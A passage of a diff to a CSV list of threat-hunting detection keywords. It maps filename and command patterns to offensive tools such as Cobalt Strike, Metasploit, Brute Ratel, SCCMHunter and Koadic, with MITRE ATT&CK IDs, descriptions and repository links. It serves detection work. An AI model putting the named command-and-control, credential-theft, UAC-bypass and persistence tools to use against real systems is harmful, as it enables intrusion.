T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*sccmdecryptpoc.*","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sccmhunter.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*sccmhunter.git*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*sccmhunter.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" 
"*sccmwtf.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" "*scdivert localhost *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*scheduledtask_utils.py *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*ScheduleRunner.csproj*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" 
"*ScheduleRunner.exe*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ScheduleRunner.sln*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" -"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*schlamperei.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*schshell.cna*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*schtask_callback*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" -"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SchTasksImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*schtquery * full*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*screengrab.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*screenshot_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Screetsec*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*screetsec/Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . 
Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*screetsec/Pateensy*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*screetsec/Vegile*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*--script broadcast-dhcp-discover*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*script/xor-bin.py*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" -"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*scripts*Remote-WmiExecute.*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
